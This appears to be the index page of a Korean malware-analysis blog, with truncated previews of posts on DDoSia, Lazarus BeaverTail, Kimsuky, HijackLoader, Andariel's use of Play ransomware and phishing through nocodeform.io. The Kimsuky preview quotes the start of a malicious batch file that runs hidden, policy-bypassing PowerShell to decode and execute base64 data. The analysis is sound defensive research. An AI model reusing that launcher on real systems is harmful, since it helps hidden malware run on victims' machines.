본문 바로가기

전체 글

(170)
95. DDoSia 러시아의 핵티비스트 그룹인 NoName057(16)이 DDoS 공격에 활용되는 것으로 알려져 있는 DDoSia 악성코드를 분석해보았다. DDoSia 악성코드는 텔레그램 채널을 통해 악성코드 동작 관련 파일들을 유포하기도 한다. * sha256: e8cf6f82a1336b76abb170337985906454f142c5cca33f6aec3591643eaf3268 먼저, 해당 악성코드는 Go 언어로 작성되었다. 공격자는 악성코드의 실행이 운영체제나 피해자 환경에 구애 받지 않도록 크로스 컴파일 기능이 존재하는 Go 언어를 사용한 것으로 보여진다. DDoSia 악성코드는 공격자 C2와 지속적으로 통신하며 공격을 수행한다. 악성코드 실행 시 가장 먼저 C2의 login 엔드포인트를 통해 로그인 과정을 수행한다. ..
94. Lazarus's Beavertail 3 (Python) 개인적으로 운용중인 OpenCTI에서 또 다른 Lazarus 그룹의 Beavertail 악성코드가 발견되었다. 이전의 Beavertail 악성코드와 비슷한 형태를 띄고 있다. 이전 악성코드 분석 글은 아래 링크에 존재한다.https://p3ngdump.tistory.com/156 87. Lazarus's Beavertail (MacOS)얼마 전, Lazarus 그룹이 MacOS 화상통화 앱에 악성코드를 삽입해 정보를 탈취하는 등의 악성행위를 수행했던 것이 밝혀졌다. 본 글에서 해당 샘플을 분석한다. 해당 악성코드는 FreeConference 앱을 위p3ngdump.tistory.comhttps://p3ngdump.tistory.com/158 88. Lazarus's BeaverTail 2 (Python)..
93. Kimsuky's pay.bat 웹 상에 디렉터리 리스팅 된 상태로 공개된 사이트를 발견하였다. Kimsuky 그룹이 해당 사이트를 장악하고 일부 경로를 사용하는 것으로 보이고, 경로 내에는 pay.bat 파일만 존재한다.  * pay.bat sha256 : 8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b 해당 파일 내용은 아래와 같다. powershell을 이용해 base64로 인코딩 된 데이터를 디코딩 후 실행한다. 또한 Invoke 등의 powershell 관련 문자열들도 어느정도 난독화 되어있다.@echo off powershell/W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('..
92. HijackLoader (IDAT Loader) 얼마 전, HijacLoader에 대해 알게되었다. 해당 로더의 동작 방식이 좀 재밌어서, 블로그에 기록한다. 로더들은 추가 악성코드를 피해자 PC에 다운로드하고 실행시키는게 목적이다. 그래서 보통 본 로더들은 파워쉘을 실행시키거나, 또 다른 파일을 실행시키는 형태로 동작한다. 위와 같은 형태인데, HijackLoader도 추가 악성코드를 실행시키는 것은 기존 로더와 동일하다. 다만, HijackLoader는 PNG 파일의 IDAT 영역에 암호화 된 파일을 숨겨놓는다. 최근 분석한 파일 중에서는 내부에 아래와 같이 png 파일이 존재했다. 이 png 파일은 분석한 파일에서 사용되지 않는 파일인데 내부에 포함되어 있었다. 이 png 파일이 HijackLoader였다. png 파일은 데이터 값으로 사용하는 ..
91. MalLlama(악성코드 분석에 LLM 활용) 보호되어 있는 글입니다.
90. Andariel's play ransomware 지난 2024년 10월 31일, 북한의 APT 그룹 중 하나인 Andariel이 Play ransomware를 사용했다는 기사가 공개되었다.https://www.darkreading.com/endpoint-security/north-korea-andariel-play-ransomware 해당 기사 내용에 따르면, Andariel이 Play ransomware와 협력하고 있는 것으로 보인다. 초기 브로커(IAB, Initial Access Broker)든 실제 Play ransomware든 Andariel의 공격에 Play ransomware를 사용한 것은 틀림없다. 개인적으로 운용하고 있는 MISP에도 해당 내용이 포착되었다. Play ransomware의 몇 샘플들과 7월 30일에 포착된 북한측 악성코..
89. Phisher's using nocodeform.io 최근 피싱 공격자들이 nocodeform.io 등의 텍스트 업로드 플랫폼을 사용하고 있다. 지난 4월 AhnLab에서도 아래와 같은 글을 공유했었다.https://asec.ahnlab.com/ko/64170/ 사실 이전에도 공격자들은 pastebin.com 같은 익명 텍스트 업로드 플랫폼을 자주 사용했었고, 파일 같은 경우도 익명 파일 업로드 사이트를 사용했었다. 하지만, pastebin과 같은 사이트가 수면위에 드러나고 대부분 보안 요소로 해당 사이트들을 차단하는 등의 행위를 사용하니까 합법적은 플랫폼을 사용하는 것으로 보여진다. 개인적으로 국내 피싱 메일들을 수집중에 있는데, 아래 피싱 메일들은 최근 수집된 메일들이다. 피싱 기법은 이전의 스피어피싱 메일들과 비슷하다. 계정을 확인하라거나, 이메일 서..
88. Lazarus's BeaverTail 2 (Python) 지난 2024년 09월 28일에 분석해 공유했던 아래 글과 관련된 추가적인 Python 악성코드들을 발견했다.https://p3ngdump.tistory.com/156 87. Lazarus's Beavertail (MacOS)얼마 전, Lazarus 그룹이 MacOS 화상통화 앱에 악성코드를 삽입해 정보를 탈취하는 등의 악성행위를 수행했던 것이 밝혀졌다. 본 글에서 해당 샘플을 분석한다. 해당 악성코드는 FreeConference 앱을 위p3ngdump.tistory.com 해당 악성코드들은 개인적으로 운용중인 OpenCTI 플랫폼에서 발견했다. OpenCTI 플랫폼에서 Malware Bazaar 데이터를 끌어오도록 설정해뒀는데, 해당 데이터에서 잡힌 것으로 보여진다. 해당 악성코드들은 이전 글에서 분석..